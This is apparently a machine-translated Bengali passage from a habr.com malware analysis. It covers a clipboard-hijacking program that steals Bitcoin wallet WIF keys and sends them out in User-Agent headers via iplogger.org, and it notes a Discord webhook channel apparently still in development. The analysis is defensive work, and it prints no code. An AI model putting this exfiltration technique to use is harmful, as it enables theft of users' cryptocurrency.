বাফারে ঠিকানাগুলি প্রতিস্থাপন করার পাশাপাশি, ম্যালওয়্যারটি বিটকয়েন, বিটকয়েন কোর এবং ইলেকট্রাম বিটকয়েন ওয়ালেটের ব্যক্তিগত WIF কীগুলিকে লক্ষ্য করে। WIF প্রাইভেট কী পেতে প্রোগ্রামটি plogger.org কে এক্সফিল্ট্রেশন চ্যানেল হিসেবে ব্যবহার করে। এটি করার জন্য, অপারেটররা ব্যবহারকারী-এজেন্ট HTTP শিরোনামে ব্যক্তিগত কী ডেটা যোগ করে, যেমন নীচে দেখানো হয়েছে।

চিত্র 4. আউটপুট ডেটা সহ আইপি লগার কনসোল।

অপারেটররা মানিব্যাগ বের করার জন্য iplogger.org ব্যবহার করেনি। ক্ষেত্রের 255 অক্ষর সীমার কারণে তারা সম্ভবত একটি ভিন্ন পদ্ধতি অবলম্বন করেছে User-Agentআইপি লগার ওয়েব ইন্টারফেসে প্রদর্শিত হয়। আমরা যে নমুনাগুলি অধ্যয়ন করেছি তাতে, অন্যান্য আউটপুট সার্ভার পরিবেশ পরিবর্তনশীলে সংরক্ষণ করা হয়েছিল DiscordWebHook. আশ্চর্যজনকভাবে, এই এনভায়রনমেন্ট ভেরিয়েবলটি কোডের কোথাও বরাদ্দ করা হয়নি। এটি পরামর্শ দেয় যে ম্যালওয়্যারটি এখনও বিকাশের অধীনে রয়েছে এবং পরিবর্তনশীলটি অপারেটরের পরীক্ষা মেশিনে বরাদ্দ করা হয়েছে৷

প্রোগ্রামটি বিকাশের মধ্যে রয়েছে এমন আরেকটি লক্ষণ রয়েছে। বাইনারি ফাইলে দুটি iplogger.org ইউআরএল রয়েছে এবং ডেটা এক্সফিল্ট করা হলে উভয়কেই জিজ্ঞাসা করা হয়। এই ইউআরএলগুলির মধ্যে একটির অনুরোধে, রেফারার ক্ষেত্রের মানটি "DEV /" দ্বারা আগে থাকে৷ আমরা এমন একটি সংস্করণও পেয়েছি যা ConfuserEx ব্যবহার করে প্যাকেজ করা হয়নি, এই URL এর প্রাপকের নাম DevFeedbackUrl। পরিবেশ পরিবর্তনশীল নামের উপর ভিত্তি করে, আমরা বিশ্বাস করি যে অপারেটররা ক্রিপ্টোকারেন্সি ওয়ালেট চুরি করার জন্য বৈধ পরিষেবা Discord এবং এর ওয়েব ইন্টারসেপশন সিস্টেম ব্যবহার করার পরিকল্পনা করছে।

উপসংহার

এই প্রচারাভিযানটি সাইবার আক্রমণে বৈধ বিজ্ঞাপন পরিষেবা ব্যবহারের একটি উদাহরণ। এই স্কিমটি রাশিয়ান সংস্থাগুলিকে লক্ষ্য করে, তবে অ-রাশিয়ান পরিষেবাগুলি ব্যবহার করে এই ধরনের আক্রমণ দেখে আমরা অবাক হব না। আপস এড়ানোর জন্য, ব্যবহারকারীদের অবশ্যই তাদের ডাউনলোড করা সফ্টওয়্যারটির উত্সের খ্যাতির বিষয়ে নিশ্চিত হতে হবে৷

সমঝোতার সূচক এবং MITER ATT&CK বৈশিষ্ট্যের একটি সম্পূর্ণ তালিকা এখানে উপলব্ধ লিংক.

উত্স: www.habr.com